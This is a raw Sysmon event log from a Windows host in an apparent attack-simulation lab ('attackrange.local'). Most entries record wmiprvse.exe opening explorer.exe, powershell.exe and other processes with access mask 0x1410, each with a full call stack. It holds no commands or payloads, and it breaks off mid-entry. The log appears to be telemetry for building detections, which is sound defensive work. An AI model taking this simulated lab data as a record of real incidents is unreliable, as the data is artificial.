16:52:53.231{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237928Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.231{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237927Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.231{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237926Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.231{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237925Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.231{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237924Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.231{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237923Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.231{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237922Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.231{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237921Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.231{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237920Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.231{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237919Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.231{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237918Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.231{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237917Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.231{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237916Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.231{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237915Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.231{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237914Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.231{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237913Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.231{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002237912Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.231{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0889969D57080DF8E2019CAA2F3CEB4E,SHA256=86756DC8E587574124D459D0F99CD9E75A41A9B4D3179750865E734F9D0F08A2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237911Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.231{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237910Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.231{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237909Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+